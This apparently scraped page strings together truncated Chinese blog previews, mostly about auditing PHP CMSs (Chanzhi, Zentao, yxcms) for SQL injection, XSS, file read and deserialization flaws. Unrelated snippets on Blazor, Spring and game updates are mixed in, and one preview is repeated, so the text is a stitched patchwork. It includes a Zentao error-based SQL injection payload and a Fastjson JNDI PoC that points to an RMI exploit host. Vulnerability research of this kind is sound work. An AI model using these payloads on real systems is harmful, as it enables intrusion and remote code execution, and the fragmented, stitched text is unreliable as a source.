https://share.weiyun.com/5cbff06337d32a9748d0f1bead5ddbd5 前台注入 在/chanzhieps/system/module/cart/control.php页面的add函数 public function add($product, $count) { if($this->app->user->account == 'guest') { /* Save info to cookie if user is guest. */ $thi…

个人博客地址:xzajyjs.cn 作为一个开源的企业门户系统(EPS), 企业可以非常方便地搭建一个专业的企业营销网站,进行宣传,开展业务,服务客户.蝉知系统内置了文章.产品.论坛.评论.会员.博客.帮助等功能,同时还可以和微信进行集成绑定.功能丰富实用,后台操作简洁方便.蝉知系统还内置了搜索引擎优化必备的功能,比如关键词,摘要,站点地图,友好路径等,使用蝉知系统可以非常方便的搭建对搜索引擎友好的网站. 今天就对他的早期版本7.x的xss漏洞进行复现. 进到他的主页,先观察到有留言板,可以考虑…

蝉知迁移步骤(2个方案,二选一即可) 方案一(整个chanzhi(eps)目录拷贝,假设新安装的蝉知文件夹名称为chanzhieps): 1.在新服务器上安装相同版本(版本号必须一致)的蝉知(安装文档: http://www.chanzhi.org/book/chanzhieps/c9.html),保证网页可以正常访问: 2.把新安装的蝉知文件夹改名,比如新安装的禅道文件夹名称为chanzhieps,改名为chanzhieps_new 3.把之前蝉知的运行代码文件夹(如果之前名称不是chanzh…

0x00 源起 最近在深入学习反射XSS时遇到蝉知CMS5.6反射型XSS这个案列,乍一看网上的漏洞介绍少之又少,也没有详细的审计复现流程.虽然是17年的漏洞了,不巧本人正是一个喜欢钻研的人.这个CMS引起我极大的兴趣.在基本没有开发经验的前提下,目前只对MVC有一点很浅显的了解后我打算啃下这块硬骨头,并且这也是我第一个较完整的审计复现的一个CMS,前前后后用了接近3天的时间才差不多搞懂触发的流程,对我来说可以说是非常艰难了,幸运的是我还是啃了下来. 可能这个漏洞不新鲜,但是我想说的是发现漏洞的…

最近用蝉知的CMS 建站比较多,感觉蛮顺手的,但在给客户安装的时候却会出现安装报错,其原因也很简单 查看了一下他们的install.sql文件中,有些时间字段的默认值是0000-00-00 00:00:00 ... 额,我个人习惯将时间值存int类型,这样程序处理上还有查询计算上会方便一些,可能他们为了在看数据库的时候方便一目了然的认出时间吧...不管它的初衷,要改程序不太可能了,以后也不好升级.我还是改我的数据库的兼容模式吧 在MySQL5.5以后,其默认使用的是一种严格模式,也就是说,像禅知…

禅知 Pro v1.6 前台任意文件读取 | 代码审计 蝉知专业版是基于蝉知企业门户系统开源版开发,继承了蝉知本身的优秀功能.相对于蝉知开源版增强了商品的属性自定义.属性价格定制.物流跟踪.微信支付.微信登录.手机短信等功能.蝉知专业更加注重企业网站的营销推广. 文件读取漏洞好好分析下.禅知Pro 1.6.1 已经修复了这个漏洞. 首先安装,安装成功,文末分享源码. 接下来开始代码审计,漏洞分析. 路径:D:\wamp\www\test\chanzhiPro1.6.php5\chanzhieps…

Posted on 四月 21, 2015 by 陈阳 近日, 易软天创与微软开放技术合作,在虚拟镜像中国站点vmdepot.msopentech.cn上成功部署易软天创的集成管理环境,为希望快速基于微软Azure云平台体验易软天创开源管理方案的朋友们提供了方便.该集成环境内置了禅道项目管理软件.蝉知企业门户系统和然之协同管理系统三个产品,可以作为一个集成环境来体验开源一体化管理解决方案.现在,让我们一道来看看这三个有中国风的开源项目吧: 禅道是第一款国产的开源项目管理软件.它集产品管理.项目管…

我们在上一篇文章中学习了DEDECMS的模板标签.模板解析原理,以及通过对模板核心类的Hook Patch来对模板的解析流量的攻击模式检测,达到修复模板类代码执行漏洞的目的 http://www.cnblogs.com/LittleHann/p/3574694.html 通过这段时间的思考,我大概对目前CMS中主流的WEB漏洞进行了大致的分类,这里给朋友们分享一些我的想法: ) 本地变量覆盖类型的漏洞: 在common.inc.php这种本地变量注册的关口进行流量监控,通过正则规则,防止黑客通过…

原文地址:http://lyscholar.cn/2019/07/30/代码审计-usualtoolcms存在sql注入漏洞/ 0x01 漏洞环境 版本信息:UsualToolCMS-8.0-Release 版本下载:http://www.a5xiazai.com/php/140604.html 官网下载:https://cms.usualtool.com/down/UsualToolCMS-8.0-Release.zip 0x02 漏洞分析 在./cmsadmin/a_templetex.ph…

漏洞分为系统漏洞和应用漏洞,系统漏洞以二进制漏洞为代表,其挖掘难度较高需要对反汇编和操作系统原理深入理解,而除了系统漏洞以外还有一些应用漏洞,包括不限MySQL,Apache,为代表的Web漏洞,这里我们就挖掘PHP代码层面的漏洞. 漏洞的挖掘也分为,点对点挖掘漏洞,和分散式挖掘漏洞,这我们主要使用点对点挖掘,在挖掘是我们需要找一些关键字,漏洞本身就是两个条件,可控的函数,和可控的变量. 闪电文件搜索:http://www.xitongzhijia.net/soft/27485.htmlCMS源…

这个cms很久前做过代码审计,很多问题,但是经过这么长时间,现在安全性提高了不少,这几天看了下,基本没有什么特别大的问题了(不包含后台). 在yxcms/protected/apps/member/controller/indexController.php中,index方法,有如下代码: $group_id=$this->auth['groupid']?$this->auth['groupid']:1; $notallow=model('memberGroup')->find(&quo…

简介 原题复现:  考察知识点:模板注入  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 [护网杯 2018]easy_tornado 打开页面发现三个链接依次打开  发现各自的文本 flag in /fllllllllllllag render md5(cookie_secret+md5(filename)) 从上面三个信息我们的值flag在/fllllllllllllag文件 render这个卡住了看了WP…

漏洞详情 禅道V16.5未对输入的account参数内容作过滤校验,导致攻击者拼接恶意SQL语句执行. 环境搭建 环境下载:禅道V16.5 下载后双击运行,进入目录运行start.exe 直接访问即可 漏洞复现 一.手工注入复现 报错型注入 payload:admin' and updatexml(1,concat(0x7e,(123=123),0x7e),1) and '1'='1 结果: 二.POC复现 结语 本文只用于参考学习,一切用于违法,犯罪与本人无关,网络不是法外之地.…

html {% from 'common/_macros.html' import static %}<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>前台注册</title> <script src="http://cdn.bootcss.com/jquery/3.1.1/jquery.min…

安装shortuuid用于前台用户的主键:pip install shortuuid 创建模型 from datetime import datetimeimport enumfrom werkzeug.security import generate_password_hash, check_password_hashimport shortuuidfrom exts import db class GenderEnum(enum.Enum): """ 性别枚举 "…

漏洞文件:application/common/controller/Base.php 中的 getAddonTemplate 方法: 错误的使用了public,导致我们可以直接外部访问. 然后使用了file_exists( 函数,导致可以触发phar://反序列化. common目录下的文件不能直接访问,只能通过继承. 寻找继承该类,并且不需要权限的文件. 注:只要继承了webbase类的都需要权限. 寻找到该文件:application/xxxx/controller/Api.php 不需要…

         在互联网发展突飞猛进的今天,可谓”得市场者得天下”,而电商已成为占据市场速度最快.范围最广的手段,进而网站建设也逐渐引起商家重视,并深入到了企业和个体的发展战略之中. 如今企业建站已不像过去那样开发维护成本高,因为网上针对企业建站的各种CMS建站系统层出不穷.像wordpress.DEDECMS.PHPCMS.蝉知CMS.帝国CMS.Discuz等,这些CMS系统本身各方面做的就参差不齐,于是乎小编经常在网上看见有人问及”哪个CMS系统最好用”.”企业建站用那个CMS系统最多”…

1.robots.txt文件 robots.txt文件我们写过爬虫的就知道,这个文件是告诉我们哪些目录是禁止爬取的.但是大部分的时候我们都能通过robots.txt文件来判断出cms的类型 如: 从wp路径可以看出这个是WordPress的cms 这个就比较明显了直接告诉我们是PageAdmin cms 也有些robots.txt里面写得不是很清楚.我们看看织梦的 从robots.txt不能直接看出来是什么cms,我们就直接把他复制到百度去查询 这样就找到了是织梦的cms 2.通过版权信息进行查…

0x00 前言 艰难徘徊这么久,终于迈出第一步,畏畏缩缩是阻碍大多数人前进的绊脚石,共勉. 系统是租车系统,这个系统是Adog师傅之前发在freebuf(http://www.freebuf.com/articles/web/162910.html)的,他审的时候没有发现sql注入,但在评论中有个师傅说有前台sql注入. 那么我就来找找前台的sql注入吧,虽说是java但其实代码审计的点都是通用的,万变不离其宗. 扯远了,这篇文章,算是踏入java代码审计领域的开篇. 0x01 基础环境搭建 源…

我做设计也有不少年头了,很多客户或者朋友找我做网站的时候,一般问我的是用什么软件系统给他们做.大部分客户希望用的软件是免费的.所以今天给大家介绍五款我自己用过还不错的,重点是还免费的建站系统. MetInfo MetInfo这个系统是一个客户指定的,让我必须用这个系统给他做网站.于是我花了一些时间去了解这个系统.整个系统可操作性还是可以的. MetInfo的框架是基于PHP+Mysql开发的. 从界面上来说,界面简洁一目了然,比较符合现在的用户习惯,扁平化的设计还是比较吸引用户的.从功能上来说,…

某cms审计思路,以及ci框架如何找寻注入点 ABOUT 之前闲着没事的时候审的某cms,之前看一群大表哥刷过一次这个cms,想着看看还能不能赶得上分一杯羹,还是审计出来些东西,来说一说一个前台注入吧,orz后面竟然发现提前一周有大表哥交了这个,虽然撞了,但是还是分析分析这个有关的一些思路吧. 首先找注入,思路其实很简单,一个模型一个模型的去看sql,有些猥琐思路,一般过滤都是单引号双引号这些,很少会有注视到类似于表名这样会使用反引号"`"这就是一个比较容易忽视的一个点.这里就找到一个…

注解这东西虽然在jdk1.5就加进来了,但他的存在还是因为使用Afinal框架的view注入才知道的.一直觉得注入特神奇,加了一句就可以把对应view生成了. 下面我们来认识一下注解这个东西 一.注解相关知识 注解相当于一种标记,在javac编译器,开发工具和其他程序可以用反射来了解你的类及各种元素上有无何种标记,看你有什么标记,就去干相应的事.标记可以加在包,类,字段,方法,方法的参数以及局部变量上. 1.元注解:作用是负责注解其他注解.Java5.0定义了4个标准的meta-annotati…

尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范.但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型.也有一些cms为了考虑老用户,所以出了gbk和utf-8两个版本. 我们就以gbk字符编码为示范,拉开帷幕.gbk是一种多字符编码,具体定义自行百度.但有一个地方尤其要注意: 通常来说,一个gbk编码汉字,占用2个字节.一个utf-8编码的汉字,占用3个字节.在php中…

尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范.但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型.也有一些cms为了考虑老用户,所以出了gbk和utf-8两个版本. 我们就以gbk字符编码为示范,拉开帷幕.gbk是一种多字符编码,具体定义自行百度.但有一个地方尤其要注意: 通常来说,一个gbk编码汉字,占用2个字节.一个utf-8编码的汉字,占用3个字节.在php中…

我们真的了解SQL注入吗? 不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动.在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一.SQL注入,包括常规注入场景.exp表达式注入场景.Action参数绑定注入场景和组合注入. 推荐1   Thinkphp where注入(ThinkPHP框架审计 )  << 点击获取   ThinkPHP是一个快速.简单的基于MVC和面向对象的轻量级PHP开发框架,遵循Apach…

在我们实际开发项目中,经常会遇到一些常量的配置,比如url,暂时不会改变的字段参数,这个时候我们最好是不要直接写死在代码里的,因为这样编写的程序,应用扩展性太差了,我们可以直接写在配置文件中然后通过配置文件读取该字段的值,这样的话以后需要更改,也不用在重新修改代码,好处不言而知. 一,字段直接注入 @Value("${example.url}") private String url; 这样直接在配置文件里写url值即可(application.properties|applicati…

SQL注入攻击(sql injection)被广泛用于非法获取网站控制权,在设计程序时,忽略或过度任性用户的输入,从而使数据库受到攻击,可能导致数据被窃取,更改,删除以及导致服务器被嵌入后门程序等 sql注入的条件用户输入数据可控,源程序要执行代码,拼接了用户输入的数据 注入两大类型(不同数据库的比较方式不同) 数字型注入:当输入的参数为整数时,可认为是数字型注入(如 id 年龄,页码等都可以认为是数字型注入,并且不需要单引号来闭合)$result = "select * freo admin…

影响范围: Fastjson<=1.2.62 需要开启autotype poc: String text1 = "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"AsText\":\"rmi://127.0.0.1:1099/exploit\"}"; pom: <dependency> <groupId&g…

目前大部分手游都会采用热更新来解决应用商店审核周期长,无法满足快节奏迭代的问题.另外热更新能够有效降低版本升级所需的资源大小,节省玩家的时间和流量,这也使其成为移动游戏的主流更新方式之一. 热更新可以分为资源热更和代码热更两类,其中代码热更又包括Lua热更和C#热更.Lua作为一种轻量小巧的脚本语言,由Lua虚拟机解释执行.所以Lua热更通过简单的源代码文件替换即可完成.反观C#的整个编译执行过程是先通过编译器将C#编译成IL(Intermediate Language),再由CLR(Commo…

开始 从今天开始,我们将开启Jx.Cms系列开发教程. 我们将会使用Jx.Cms来介绍Blazor的开发.MVC的开发,热插拔插件的开发等等一系列开发教程. 介绍 Jx.Cms是一个使用最新版.NET(目前为.NET6)的Cms系统,前台使用MVC,后台使用Blazor. 亮点 前台使用MVC,SEO友好,在Controller之外同时支持Pages,可以无限扩展所需页面. 后台使用Blazor,借助BootstrapBlazor组件库,无需js,全程c#快速开发. 支持插件热插拔,无需重启应用…